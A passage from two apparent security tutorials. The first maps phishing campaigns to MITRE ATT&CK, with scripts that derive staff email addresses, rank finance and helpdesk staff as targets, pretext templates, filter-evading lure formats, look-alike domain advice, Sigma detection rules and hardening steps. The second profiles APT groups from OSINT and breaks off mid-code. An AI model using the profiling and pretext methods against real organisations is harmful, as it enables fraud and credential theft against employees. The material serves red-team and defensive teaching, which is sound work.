Business Relationships | T1591.002 | Vendor/partner pretext chains
Identify Roles | T1591.004 | Who approves wires, who resets passwords
Search Open Websites/Domains: Social Media | T1593.001 | Social-media profiling
Search Open Technical Databases | T1596 | Cert transparency, Shodan, WHOIS

Once you know the email format, every name you scrape becomes an address. That’s the whole point of T1589.002:

# T1589.002 — derive addresses from a known naming convention.
formats   = ["{first}.{last}", "{f}{last}", "{first}{l}"]
domain    = "example.com"
employees = [("jane", "doe"), ("ahmed", "khan")]

for first, last in employees:
    for fmt in formats:
        addr = fmt.format(first=first, last=last,
                          f=first[0], l=last[0]) + "@" + domain
        print(addr)   # later: validate against MX / catch-all behavior

Scraped profile data turns into a prioritized target map. The goal is T1591.004 — separate the people who can wire money or reset passwords from everyone else:

import json
import re

# T1591.004: convert scraped profiles into a ranked target list.
with open("profiles.json") as f:
    people = json.load(f)

HIGH_VALUE = {"finance", "accounts payable", "it", "helpdesk", "executive"}
# Match whole words only, so "it" does not fire on "marketing" or "facilities".
HIGH_VALUE_RE = re.compile(
    r"\b(" + "|".join(map(re.escape, sorted(HIGH_VALUE))) + r")\b"
)

for p in people:
    dept = p.get("department", "").lower()
    priority = "HIGH" if HIGH_VALUE_RE.search(dept) else "low"
    print(f"{priority:4} | {p.get('name', '?'):24} | {p.get('title', '?')}")

Infrastructure and tech-stack intelligence (T1596) tunes the theme. If certificate transparency logs reveal a Citrix or VPN gateway, “your VPN certificate expires in 24 hours” becomes credible:

# T1596 — map the footprint from public technical databases.
whois example.com | grep -Ei 'registrar|creation|name server'
dig +short MX example.com               # mail routing → gateway vendor fingerprint

# Certificate Transparency: enumerate subdomains without touching the target.
curl -s "https://crt.sh/?q=%25.example.com&output=json" \
  | jq -r '.[].name_value' | sort -u

Tool | Description | Link
theHarvester | Email/domain/name harvesting from public sources | github.com
Maltego | Graphical link analysis for org mapping | maltego.com
Hunter.io | Email format discovery and verification | hunter.io
Recon-ng | Modular OSINT framework | github.com
Have I Been Pwned | Credential-exposure checking | haveibeenpwned.com
OSINT Framework | Curated index of profiling resources | osintframework.com

4. Pretexting Fundamentals

A pretext is a fabricated backstory that gives the lure context. The believable ones lean on a small set of influence principles:

Principle | Description
Authority | Impersonating IT helpdesk, C-suite, auditors, or law enforcement
Urgency / Scarcity | “Account expires in 24 hours,” “final warning before suspension”
Social proof | Referencing real colleagues, known vendors, ongoing projects
Likability / Familiarity | Hijacking an existing email thread (reply-chain phishing)
Pretext narrative | A plausible story matching the target’s job and industry

The skeleton that turns those principles into a message:

[ROLE the sender claims]        -> "Microsoft 365 Security Team"
+ [AUTHORITY trigger]           -> policy / compliance / mandate
+ [URGENCY hook]                -> "session expires in 24h"
+ [ACTION request]              -> "re-verify at <link>"
+ [PLAUSIBLE sender + branding] -> aged look-alike domain, correct logo
= a lure that survives the recipient's first three seconds of scrutiny

Matching the Pretext to the Role

Profiling pays off here. A generic lure addressed to everyone is weaker than three tailored ones. Finance gets invoice-fraud and vendor-payment-change narratives. IT and helpdesk staff get credential-reset and MFA-enrollment pretexts. Executives get CEO-fraud and board-document lures. The pretext has to fit what the recipient already expects to receive on a normal Tuesday.


Hierarchy diagram mapping a profiled target list into three role groups — Finance, IT/Helpdesk, and Executive — each branching to its tailored pretext lure type
Profiling converts a generic target pool into role-specific pretexts; a lure matched to the recipient’s actual workflow is far more convincing than a broadcast message.

5. Lure Design and Delivery Vector Selection

The delivery vector is T1566 (Phishing), and the sub-technique you pick is a trade-off between trust, evasion, and what the target’s controls inspect:

Sub-technique | ID | Delivery mechanism
Spearphishing Attachment | T1566.001 | Malicious file: Office doc, PDF, ISO, LNK, OneNote
Spearphishing Link | T1566.002 | Link to harvesting page or payload host
Spearphishing via Service | T1566.003 | Teams, Slack, LinkedIn DM, cloud storage
Spearphishing Voice | T1566.004 | Vishing / callback phishing

Attachment campaigns rely on User Execution (T1204.002) — the victim has to open and trigger the file. Links exist precisely to avoid attachment scanning. If a gateway detonates attachments, you move to a link; if it rewrites links, you move to something the scanner doesn’t understand.

Lure format | Abuse scenario
ISO / VHD in archive | Container strips Mark-of-the-Web from the inner payload
LNK file | Shortcut launches a hidden interpreter on double-click
OneNote attachment | Embedded “click to view” object spawns a child process
Double-extension file | invoice.pdf.exe reads as a PDF in a narrow window
QR code (“quishing”) | URL lives in an image, so there is no clickable link for gateways to parse
HTML smuggling | Browser assembles the payload locally from inline data

HTML smuggling is worth understanding because it inverts the perimeter: the file never crosses the network as a file, so attachment and URL scanners see only plain HTML.

<!-- Illustrative ONLY — shows why HTML smuggling evades file/URL scanners.
     The "payload" never traverses the network as a file; the browser builds it
     locally from a string already inside the HTML. The gateway sees inert markup. -->
<script>
  const data = atob("SGVsbG8gZnJvbSB0aGUgYnJvd3Nlcg==");   // benign demo content
  const blob = new Blob([data], { type: "application/octet-stream" });
  const url  = URL.createObjectURL(blob);
  const a    = document.createElement("a");
  a.href = url; a.download = "invoice.txt";                // forces a local "save"
  // a.click();   // auto-trigger left disabled deliberately
</script>

6. Sender Infrastructure and Spoofing

Delivery fails at the envelope if the sender looks wrong. Adversaries register look-alike domains (T1583.001) — corp-helpdesk.example against the real corp.helpdesk.example — and warm up aged sending accounts (T1585.002) so they pass reputation filters. The highest-trust option is hijacking a real conversation from a compromised third-party mailbox (T1586.002), where the reply lands inside an existing thread the victim already trusts.

From the attacker’s chair, the three email-authentication records define what’s possible:

Control | What it does
SPF (TXT) | Authorizes sending IPs; ~all softfails, -all hardfails
DKIM | Cryptographic signature over headers/body; detects mid-transit tampering
DMARC | Enforces policy (p=reject / p=quarantine / p=none) on SPF/DKIM failure and binds both to the From: header via alignment

Direct domain spoofing dies against a hard -all SPF record plus DMARC p=reject. That’s why attackers pivot to look-alike domains — a domain you control passes its own SPF and DKIM cleanly, and DMARC has nothing to complain about because the From: is genuinely yours.
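A defender can check whether their own domain meets that bar by reading the two TXT records. The sketch below only parses record strings you have already fetched; the function names and sample records are hypothetical, and it does not evaluate SPF includes or DKIM alignment.

```python
SPF_ALL_TERMS = ("-all", "~all", "?all", "+all", "all")


def parse_tags(record: str) -> dict:
    """Split a DMARC-style 'k=v; k=v' TXT record into a lowercase-keyed dict."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def posture(spf_record: str, dmarc_record: str) -> dict:
    """Report the SPF 'all' qualifier, the DMARC policy, and whether both are strict."""
    terms = spf_record.lower().split()
    all_term = next((t for t in terms if t in SPF_ALL_TERMS), None)
    policy = parse_tags(dmarc_record).get("p", "none").lower()
    return {
        "spf_all": all_term,
        "dmarc_policy": policy,
        "hard_fail_plus_reject": all_term == "-all" and policy == "reject",
    }


# Hypothetical records for two domains.
print(posture("v=spf1 include:_spf.example.net -all",
              "v=DMARC1; p=reject; rua=mailto:dmarc@example.com"))
print(posture("v=spf1 include:_spf.example.net ~all", "v=DMARC1; p=none"))
```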

A war story worth your hour: I once burned a beautifully aged look-alike domain in the first thirty minutes of a campaign because the landing page’s TLS certificate had been issued that morning. A switched-on analyst pulled the cert transparency log, saw a brand-new cert on a brand-new host receiving inbound clicks, and quarantined the whole run. The same crt.sh query you use to profile a target is the one defenders use to catch you. Provision infrastructure days ahead, not minutes.
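The analyst's side of that story can be partly automated: take the hostnames that show up in certificate transparency output and flag the ones sitting suspiciously close to your own domain. This is a rough sketch under stated assumptions: the names are already collected into a list, a plain edit-distance threshold stands in for real look-alike scoring, and all function names and sample hosts are illustrative.

```python
def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance via row-by-row dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        curr = [i]
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            curr.append(min(prev[j] + 1, curr[j - 1] + 1, prev[j - 1] + cost))
        prev = curr
    return prev[-1]


def lookalikes(own_domain: str, observed: list, max_distance: int = 2) -> list:
    """Return observed names that are near, but not under, own_domain."""
    hits = []
    for name in sorted({n.lower().lstrip("*.") for n in observed}):
        if name == own_domain or name.endswith("." + own_domain):
            continue  # our own domain or a legitimate subdomain
        if edit_distance(name, own_domain) <= max_distance:
            hits.append(name)
    return hits


# Hypothetical names pulled from a CT search.
seen = ["corp-helpdesk.example", "mail.corp.helpdesk.example",
        "*.corp.helpdesk.example", "unrelated.example"]
print(lookalikes("corp.helpdesk.example", seen))
```

Edit distance misses homoglyphs and added keywords, so treat a hit as a prompt to look at certificate age and hosting, not as a verdict.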


Flow diagram showing an inbound email passing sequentially through SPF, DKIM, and DMARC authentication checks with pass paths leading to inbox delivery and fail paths leading to quarantine or rejection
Direct domain spoofing is defeated by SPF -all plus DMARC p=reject — which is precisely why attackers pivot to look-alike domains that pass their own authentication cleanly.

7. Reconnaissance Phishing vs. Payload Delivery

Not every phishing message delivers malware. T1598 (Phishing for Information) sits under Reconnaissance — it tricks the target into divulging credentials or actionable data with no payload at all. A fake login portal (T1598.003) harvests a password; callback phishing extracts data verbally over the phone. The defining indicator: no malicious attachment, no exploit-laden link. That absence is what distinguishes T1598 from T1566.

Three modern variants defeat MFA and deserve detection-level treatment (no working frameworks here):

  • Adversary-in-the-Middle (T1557). A reverse proxy relays the victim’s real login to the real service and captures the session cookie issued after a successful MFA prompt. The stolen cookie replays the authenticated session — the second factor never protected anything because it already passed.
  • MFA Request Generation (T1621). Push-bombing a target with repeated approval prompts until fatigue or confusion yields a tap.
  • OAuth device-code phishing. Abusing the device-authorization flow to capture tokens without ever touching a password, against M365 and Google Workspace.

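The defensive answer to the first two is phishing-resistant authentication (FIDO2 / passkeys), which is not susceptible to relay because the credential is bound to the legitimate origin. Device-code phishing needs a separate control, because the victim authenticates on the legitimate origin: restrict or block the device-authorization flow through conditional access policy wherever it isn’t required.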


8. Campaign Execution and Metrics

For authorized simulations, GoPhish handles sending profiles, landing pages, and tracking. The shape of a scoped, consented campaign:

# Authorized simulation only. Illustrative profile + campaign shape.
sending_profile:
  name: "IT Helpdesk Sim"
  from_address: "helpdesk@corp-helpdesk.example"   # pre-warmed look-alike
  host: "smtp.relay.internal:587"
  username: "sim-sender"
  ignore_cert_errors: false

campaign:
  name: "Q3 Awareness - Password Reset"
  url: "https://corp-helpdesk.example/reset"        # tracked landing page
  launch_date: "2026-07-01T09:00:00Z"
  tracking_pixel: true                              # open-rate beacon
  groups: ["finance-pilot"]                         # scoped, consented list

Read the metrics honestly. Open rate measures subject-line and sender plausibility. Click rate measures pretext strength. Submit rate — credentials actually entered — is the number that matters for risk, and it’s the one you report. Don’t shame individuals; aggregate by department and feed the result back into training. And when the engagement closes, destroy the harvested submissions per your data-handling rules.
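Aggregating by department is a few lines of code once the results are exported. The sketch below assumes one record per recipient with boolean outcome fields; the field names and sample rows are hypothetical and do not reflect GoPhish's actual export schema.

```python
from collections import defaultdict

STAGES = ("opened", "clicked", "submitted")


def rates_by_department(results):
    """Aggregate per-recipient outcomes into percentage rates per department."""
    counts = defaultdict(lambda: {"sent": 0, **{s: 0 for s in STAGES}})
    for row in results:
        bucket = counts[row["department"]]
        bucket["sent"] += 1
        for stage in STAGES:
            bucket[stage] += 1 if row.get(stage) else 0
    return {
        dept: {stage: round(100 * c[stage] / c["sent"], 1) for stage in STAGES}
        for dept, c in counts.items()
    }


# Hypothetical, anonymized results: department and outcomes only, no names.
results = [
    {"department": "finance", "opened": True,  "clicked": True,  "submitted": True},
    {"department": "finance", "opened": True,  "clicked": True,  "submitted": False},
    {"department": "finance", "opened": True,  "clicked": False, "submitted": False},
    {"department": "finance", "opened": False, "clicked": False, "submitted": False},
]
print(rates_by_department(results))
```

Keeping names out of the input in the first place is the simplest way to honor the no-shaming rule and shrink what has to be destroyed at engagement close.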


9. Detection and Defense — The Defender’s View

Recon is invisible, so defense concentrates at delivery and execution. Email authentication is the first wall: enforce DMARC p=reject with alignment, and teach analysts to read the headers.

# Defender view: read Authentication-Results to spot spoofing.
$headers = Get-Content .\suspicious.eml -Raw
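# (?ms): ^ anchors at line starts and . spans newlines, so folded (multi-line) headers are captured whole.
[regex]::Matches($headers, '(?ms)^Authentication-Results:.*?(?=\r?\n(?![ \t]))') |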
    ForEach-Object { $_.Value }
# Flag: spf=fail, dkim=fail, dmarc=fail (or dmarc=none = no enforcement)

Flow diagram illustrating the defender detection kill chain from email delivery through DMARC authentication, gateway sandbox, user execution, Sysmon process-creation event capture, and Sigma rule alert escalation to the SOC
Because recon is invisible, defense must layer at delivery (email auth, gateway) and execution (Sysmon EID 1, Sigma rules) to catch what passive OSINT collection never exposes.
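For triage at volume, the same header check is easy to script. This is a minimal sketch using only the standard library's email parser; the function name and the sample message are made up, and real Authentication-Results headers carry more fields than this handles.

```python
from email import message_from_string

MECHANISMS = ("spf", "dkim", "dmarc")


def auth_failures(raw_message: str) -> list:
    """Return (mechanism, result) pairs for every non-pass authentication result."""
    msg = message_from_string(raw_message)
    found = []
    for header in msg.get_all("Authentication-Results", []):
        unfolded = " ".join(header.split())  # collapse folded continuation lines
        for part in unfolded.split(";"):
            part = part.strip().lower()
            for mech in MECHANISMS:
                if part.startswith(mech + "="):
                    tokens = part[len(mech) + 1:].split()
                    result = tokens[0] if tokens else ""
                    if result != "pass":
                        found.append((mech, result))
    return found


# Hypothetical message with a folded Authentication-Results header.
SAMPLE = (
    "Authentication-Results: mx.example.net;\n"
    " spf=fail smtp.mailfrom=corp.example;\n"
    " dkim=none;\n"
    " dmarc=fail header.from=corp.example\n"
    "From: helpdesk@corp.example\n"
    "Subject: test\n"
    "\n"
    "body\n"
)
print(auth_failures(SAMPLE))
```

Only trust the Authentication-Results header added by your own receiving gateway; a sender can insert a forged copy further down the header stack.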

Post-delivery, the payload betrays itself through process lineage. Key Sysmon events:

Event ID | Name | Relevance to phishing
1 | Process Create | outlook.exe → powershell.exe, winword.exe → cmd.exe
3 | Network Connection | Unusual outbound from an Office app (C2 callback)
11 | File Created | Attachment written under %LOCALAPPDATA%\Microsoft\Windows\INetCache\Content.Outlook\
15 | FileCreateStreamHash | Zone.Identifier ADS confirms internet origin (MOTW)
22 | DNS Query | Office or browser DNS right after lure interaction

The canonical detection — an Office app spawning a script interpreter:

title: Office Application Spawning a Script Interpreter
id: 6c4f1a2e-phishing-office-child   # placeholder; Sigma expects a UUIDv4 here, generate one before deploying
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith:
      - '\winword.exe'
      - '\excel.exe'
      - '\outlook.exe'
      - '\onenote.exe'
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\mshta.exe'
      - '\wscript.exe'
      - '\cscript.exe'
  condition: selection
tags:
  - attack.initial_access
  - attack.t1566.001
  - attack.t1204.002
level: high
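The rule's selection is an AND of two suffix lists, which is simple to replay over exported process-creation events when tuning for false positives. The sketch below assumes events as dicts with Sysmon-style field names; the sample paths are invented and this is not a substitute for a Sigma backend.

```python
OFFICE_PARENTS = ("\\winword.exe", "\\excel.exe", "\\outlook.exe", "\\onenote.exe")
INTERPRETERS = ("\\powershell.exe", "\\cmd.exe", "\\mshta.exe",
                "\\wscript.exe", "\\cscript.exe")


def office_spawned_interpreter(event: dict) -> bool:
    """True when an Office parent image launched a script interpreter."""
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    # str.endswith accepts a tuple, matching the rule's endswith lists.
    return parent.endswith(OFFICE_PARENTS) and image.endswith(INTERPRETERS)


# Hypothetical Event ID 1 records.
suspicious = {
    "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
}
benign = {
    "ParentImage": "C:\\Windows\\explorer.exe",
    "Image": "C:\\Windows\\System32\\cmd.exe",
}
print(office_spawned_interpreter(suspicious), office_spawned_interpreter(benign))
```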

Catch attachment execution by its working directory:

title: Process Execution From Outlook Attachment Temp Path
id: 9a2b7c10-phishing-outlook-temp   # placeholder; Sigma expects a UUIDv4 here, generate one before deploying
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    CurrentDirectory|contains: '\Content.Outlook\'
  condition: selection
tags:
  - attack.initial_access
  - attack.t1566.001
level: high

Credential-harvest fallout shows up in the Security log — 4625 (failed logon), 4740 (lockout from spray), 4688 (process creation with command-line auditing) — and in M365 / Entra ID sign-in risk events. Hardening that actually moves the needle:

  • ASR rules blocking Office apps from spawning child processes.
  • Protected View + Trust Center disabling internet-origin macros by default, with MOTW enforced even for archive-extracted files to kill the ISO bypass.
  • Safe Links / Safe Attachments for click-time URL rewriting and sandbox detonation.
  • FIDO2 / passkeys over push-based MFA — the only control that survives AiTM.
  • Limiting public OSINT exposure — shallow public org charts, undisclosed email formats, sanitized job postings.
  • Awareness training using current lures (ISO, OneNote, QR), not just decade-old attachment scares.

10. MITRE ATT&CK Mapping

Technique | MITRE ID | Detection
Gather Victim Identity Information | T1589 | Largely invisible; monitor breach exposure, 4625/4740 downstream
Gather Victim Org Information / Roles | T1591 / T1591.004 | Limit public org-chart depth
Search Open Technical Databases | T1596 | Monitor own CT logs for look-alike certs
Acquire Infrastructure: Domains | T1583.001 | Newly-registered-domain blocking at gateway
Compromise Accounts: Email | T1586.002 | Anomalous reply-chain sender, header mismatch
Phishing | T1566 | Email auth, gateway telemetry, Sysmon EID 1
Spearphishing Attachment | T1566.001 | Sysmon EID 1/11/15, Office child-process Sigma
Spearphishing Link | T1566.002 | Safe Links, URL detonation
Spearphishing Voice | T1566.004 | Helpdesk verification policy, user reporting
User Execution: Malicious File | T1204.002 | Parent-child process chain
Phishing for Information | T1598 | Link to harvest page with no payload
Adversary-in-the-Middle | T1557 | Impossible-travel, session anomalies; FIDO2
MFA Request Generation | T1621 | Repeated push prompts in sign-in logs

Summary

  • A phishing campaign is won during reconnaissance, not in the message — the dossier and pretext decide the outcome before delivery.
  • Target profiling chains passive OSINT (T1589, T1591, T1593, T1596) into a ranked list, generating almost no target-side telemetry.
  • Pretexts weaponize authority, urgency, and familiarity; the strongest ones match the recipient’s actual job function.
  • Delivery vector (T1566 sub-techniques) is a trade-off against the controls in place — attachment, link, service, or voice — with ISO, OneNote, quishing, and HTML smuggling as modern evasion paths.
  • T1598 harvests data with no payload, and AiTM (T1557) defeats push-based MFA — both demand phishing-resistant FIDO2.
  • Defenders win at delivery and execution: enforce DMARC p=reject, hunt Office child-process chains via Sysmon EID 1, and convert every red-team finding into a concrete blue-team control.

APT Profiling: How to Build a Comprehensive Adversary Profile from Open-Source Intelligence

Objective: Learn how to systematically collect, structure, and operationalize open-source intelligence into a complete, ATT&CK-mapped adversary profile — a defensible dossier that drives realistic adversary emulation, detection-gap analysis, and threat-informed defense.


1. What Is an Adversary Profile and Why Build One

An adversary profile is a structured dossier describing who a threat actor is, what they target, how they operate, and which tools and infrastructure they favor — all normalized to a shared taxonomy. It is the durable opposite of an IOC-only feed.

An IOC feed gives you hashes and IP addresses that expire in days. A profile captures the actor’s tactics, techniques, and procedures (TTPs), which change slowly and cost the adversary real effort to alter. A finished profile is the source artifact for three downstream activities:

  • Adversary emulation — sequencing a real group’s TTPs into a test plan.
  • Detection engineering — overlaying the profile against your sensor coverage to find gaps.
  • Risk communication — translating actor capability and intent for leadership.

Threat intelligence comes in four flavors, and a good profile feeds all of them: strategic (executive risk), tactical (SOC TTPs), operational (incident-response context), and technical (machine-readable indicators).


2. The Intelligence Lifecycle Applied to APT Profiling

Cyber threat intelligence is produced through a six-phase lifecycle. Profiling is just this lifecycle scoped to a single actor.

Phase | Profiling Activity
Planning / Direction | Define the intelligence requirement: “Which APT threatens our sector, and can we detect its TTPs?”
Collection | Gather vendor reports, advisories, passive DNS, malware samples
Processing | Normalize raw reports; extract candidate TTPs and IOCs
Analysis | Map to ATT&CK, assess confidence, resolve naming conflicts
Dissemination | Publish as STIX bundle, Navigator layer, and emulation plan
Feedback | Refine the profile as new reporting and red-team results arrive

Start with an explicit Priority Intelligence Requirement (PIR) or Request for Information (RFI). Without a scoped question, collection sprawls and the profile never converges.


3. Analytical Frameworks: Diamond Model, Kill Chain, and ATT&CK

Three frameworks provide complementary lenses. Use all three — they are not interchangeable.

Framework | Role in APT Profiling
MITRE ATT&CK | Maps observed TTPs to a standardized taxonomy for comparison and emulation
Cyber Kill Chain (Lockheed Martin) | Sequences behaviors across reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on objectives
Diamond Model | Relates the four core intrusion elements: Adversary, Infrastructure, Capability, Victim

The Diamond Model is the pivoting engine. Each intrusion event has four interconnected vertices, and the relationships between them drive investigation. The adversary–infrastructure edge reveals how operators stand up C2; the victim–capability edge exposes which tooling is used against which target. Unlike the sequential Kill Chain, the Diamond Model excels at attribution and visualizing relationships — pivot from a known malware sample to the infrastructure that served it, then to other victims of the same infrastructure.

ATT&CK then supplies the granular vocabulary that makes those pivots comparable across reports and across teams.
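
The pivot described above (malware sample to serving infrastructure to other victims) can be sketched in a few lines. This is a minimal illustration, not a Diamond Model implementation: the `DiamondEvent` class, the `pivot` helper, and every event value are hypothetical placeholders.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class DiamondEvent:
    """One intrusion event described by the four Diamond Model vertices."""
    adversary: str
    infrastructure: str
    capability: str
    victim: str


def pivot(events, vertex, value, target):
    """Distinct `target` values across events whose `vertex` equals `value`."""
    return sorted({getattr(e, target) for e in events if getattr(e, vertex) == value})


# Hypothetical events; names are placeholders, not real reporting
events = [
    DiamondEvent("UNKNOWN-1", "c2.example.test", "LoaderA", "victim-energy"),
    DiamondEvent("UNKNOWN-1", "c2.example.test", "LoaderA", "victim-telecom"),
    DiamondEvent("UNKNOWN-2", "cdn.example.test", "LoaderB", "victim-retail"),
]

# Known malware sample -> infrastructure that served it -> other victims
infra = pivot(events, "capability", "LoaderA", "infrastructure")
victims = [v for i in infra for v in pivot(events, "infrastructure", i, "victim")]
print(infra)    # ['c2.example.test']
print(victims)  # ['victim-energy', 'victim-telecom']
```

Each call walks one edge of the diamond, so chaining calls reproduces the analyst's pivot path and leaves an auditable trail of which edge justified each link.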


Diamond Model vertices (Adversary, Infrastructure, Capability, Victim) interconnected with edges, annotated with Kill Chain sequencing and ATT&CK TTP taxonomy as complementary overlays
The Diamond Model drives adversary-infrastructure pivoting, the Kill Chain orders the attack sequence, and ATT&CK supplies the precise technique vocabulary — all three are required for a complete profile.

4. OSINT Collection: Primary Source Taxonomy

OSINT spans news media, social media, public records, government publications, academic research, commercial data, and the deep/dark web. For APT profiling, prioritize these primary source classes and score each for reliability.

Source Type | Description
Vendor threat reports | Mandiant, CrowdStrike Intelligence, Microsoft MSTIC, Secureworks CTU, Elastic Security Labs, SpecterOps
Government advisories | CISA advisories (often with embedded ATT&CK mappings), NSA/CISA joint advisories, FBI Flash
MITRE ATT&CK Groups | Curated, attributed group profiles at attack.mitre.org/groups/
Malware repositories | VirusTotal, MalwareBazaar, Hybrid Analysis for tooling attribution
Infrastructure / passive DNS | Shodan, Censys, DomainTools, WHOIS/RDAP, certificate transparency logs
Code repositories | GitHub/GitLab for leaked tooling and infrastructure-as-code patterns

Infrastructure pivoting is largely passive. The example below queries Shodan for hosts matching a documented C2 fingerprint — a benign illustration of the adversary–infrastructure edge.

import shodan

API_KEY = "YOUR_API_KEY"      # placeholder — never commit real keys
api = shodan.Shodan(API_KEY)

# Pivot on a publicly documented C2 framework fingerprint
query = 'product:"Cobalt Strike Beacon" ssl.cert.subject.CN:"example-c2.test"'
results = api.search(query)

for host in results["matches"]:
    print(host["ip_str"], host.get("port"), host.get("org"))

Rate every source with the Admiralty Code: source reliability (A–F) and information credibility (1–6). A single vendor blog is B2 at best; corroboration across two independent vendors plus a government advisory raises confidence.
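
To keep ratings consistent across analysts, the two Admiralty axes can be held in lookup tables. The sketch below uses the standard labels for each grade; the `corroborated` rule (two or more distinct independent sources) is an assumption for illustration, not part of the Admiralty Code itself.

```python
RELIABILITY = {
    "A": "Completely reliable", "B": "Usually reliable", "C": "Fairly reliable",
    "D": "Not usually reliable", "E": "Unreliable", "F": "Reliability cannot be judged",
}
CREDIBILITY = {
    1: "Confirmed by other sources", 2: "Probably true", 3: "Possibly true",
    4: "Doubtful", 5: "Improbable", 6: "Truth cannot be judged",
}


def parse_rating(code: str):
    """Split a rating such as 'B2' into (reliability, credibility) labels."""
    letter, digit = code[0].upper(), int(code[1:])
    if letter not in RELIABILITY or digit not in CREDIBILITY:
        raise ValueError(f"not an Admiralty rating: {code!r}")
    return RELIABILITY[letter], CREDIBILITY[digit]


def corroborated(source_owners, minimum=2):
    """Hypothetical rule: enough distinct, independent sources report the claim."""
    return len(set(source_owners)) >= minimum


print(parse_rating("B2"))                       # ('Usually reliable', 'Probably true')
print(corroborated(["vendor-a", "vendor-a"]))   # False: same source twice
print(corroborated(["vendor-a", "cisa"]))       # True
```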


5. Building the Adversary Dossier

Capture the profile in a fixed schema so that every actor is described the same way and TTP heatmaps are comparable. Use this template as your reference document.

Field | Content
Actor ID | Canonical tracker (e.g., ATT&CK G0016)
Aliases | Associated group names and vendor designations
Nexus | Suspected country of origin / state sponsorship
Motivation | Espionage, financial, ideological, destructive
Active Since | First reported activity date
Targeting | Sectors, geographies, victim profile
Tooling | Malware families and offensive tools
Infrastructure Patterns | Registrar habits, ASN clusters, cert reuse, C2 conventions
ATT&CK Techniques | Normalized technique-ID list with frequency
IOCs | Hashes, domains, IPs (with confidence and decay date)
Confidence | Admiralty rating per claim
Sources | Cited reports with retrieval dates
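
One way to enforce the schema is to encode it as a data class so that a missing field is obvious at construction time. The sketch below mirrors the fields in the table; the class names, helper methods, and the placeholder indicator values are assumptions made for illustration.

```python
from dataclasses import dataclass, field
from datetime import date


@dataclass
class Indicator:
    value: str
    kind: str          # "sha256", "domain", or "ip"
    confidence: str    # Admiralty rating for this indicator, e.g. "B2"
    decay: date        # re-validate or retire the indicator after this date


@dataclass
class Dossier:
    actor_id: str                                   # canonical tracker, e.g. ATT&CK group ID
    aliases: list = field(default_factory=list)
    nexus: str = "unknown"
    motivation: list = field(default_factory=list)
    active_since: str = "unknown"
    targeting: list = field(default_factory=list)
    tooling: list = field(default_factory=list)
    infrastructure_patterns: list = field(default_factory=list)
    techniques: dict = field(default_factory=dict)  # technique ID -> observation count
    iocs: list = field(default_factory=list)
    confidence: dict = field(default_factory=dict)  # claim -> Admiralty rating
    sources: list = field(default_factory=list)     # (citation, retrieval date) pairs

    def live_iocs(self, today: date) -> list:
        """Indicators whose decay date has not yet passed."""
        return [i for i in self.iocs if i.decay >= today]

    def top_techniques(self, n: int = 3) -> list:
        """Most frequently observed technique IDs, for heatmap scoring."""
        return sorted(self.techniques, key=lambda t: (-self.techniques[t], t))[:n]


profile = Dossier(
    actor_id="G0016",
    aliases=["APT29", "Cozy Bear"],
    techniques={"T1566.001": 5, "T1059.001": 4, "T1003.001": 3},
    iocs=[Indicator("example-c2.test", "domain", "C3", date(2025, 1, 31)),   # placeholder
          Indicator("old-c2.test", "domain", "C3", date(2024, 1, 31))],      # placeholder
)
print(profile.top_techniques(2))                                 # ['T1566.001', 'T1059.001']
print([i.value for i in profile.live_iocs(date(2024, 6, 1))])    # ['example-c2.test']
```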

ATT&CK’s Group object aligns directly with several of these fields, so anchor your dossier to it.

Field | Description
Group ID | Unique identifier (e.g., G0016 for APT29)
Associated Groups | Publicly reported overlapping names (formerly “Aliases”)
Description | Activity dates, suspected attribution, targeted industries
Techniques Used | Techniques with a note on how the group used each
Software | Malware and tool families attributed to the group
Campaigns | Named, time-bounded intrusion clusters

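ATT&CK tracked 176 groups at the time of writing; the count changes with each release, so check the Groups page for the current figure. Group descriptions typically cover suspected attribution, targeted geographies, and targeted sectors.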


Hierarchical diagram showing an Adversary Profile root node branching into six structured fields: Identity and Attribution, Targeting, ATT&CK TTP Heatmap, Tools and Malware, Infrastructure Patterns, and Admiralty Confidence Rating
A fixed dossier schema ensures every actor profile shares the same structure, making TTP heatmaps and coverage gap analyses directly comparable across groups.

6. ATT&CK Mapping: Extracting and Normalizing Techniques

Follow CISA’s Best Practices for MITRE ATT&CK Mapping: read the report, find the behavior, then map to the most specific technique the evidence supports. The cardinal sin is over-mapping — claiming a sub-technique when the text only justifies a tactic.

A conceptual keyword-to-technique pass illustrates semi-automated extraction. This is not a production NLP classifier; treat it as a triage aid that an analyst validates.

import json

# Local ATT&CK Enterprise snapshot (STIX bundle) loaded for ID validation
with open("enterprise-attack.json") as f:
    bundle = json.load(f)

# Illustrative keyword -> technique lookup, manually curated
keyword_map = {
    "spearphishing attachment": "T1566.001",
    "powershell":               "T1059.001",
    "wmi":                      "T1047",
    "scheduled task":          "T1053.005",
    "lsass":                   "T1003.001",
}

report = """The actor sent a spearphishing attachment, used PowerShell to
run a loader, registered a scheduled task for persistence, and dumped
credentials from LSASS."""

report_l = report.lower()
hits = sorted({tid for kw, tid in keyword_map.items() if kw in report_l})
print(hits)   # ['T1003.001', 'T1053.005', 'T1059.001', 'T1566.001']

Every machine-suggested ID gets human confirmation against the report sentence before it enters the profile.


7. Querying ATT&CK Group Data Programmatically

MITRE publishes ATT&CK as STIX. Pull a group’s techniques directly with mitreattack-python rather than scraping the website.

from mitreattack.stix20 import MitreAttackData

mitre = MitreAttackData("enterprise-attack.json")

# Resolve the documented group by alias (use real, attributed groups only)
group = mitre.get_groups_by_alias("APT29")[0]   # G0016

techniques = mitre.get_techniques_used_by_group(group.id)
for entry in techniques:
    tech = entry["object"]
    attack_id = mitre.get_attack_id(tech.id)
    print(attack_id, tech.name)

You can also reach the live TAXII 2.1 server and walk the relationship graph yourself, pivoting intrusion-set → uses → attack-pattern.

from taxii2client.v21 import Server
from stix2 import TAXIICollectionSource, Filter

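# Server() expects the TAXII discovery URL; the API root itself lives under /api/v21/
server = Server("https://attack-taxii.mitre.org/taxii2/")
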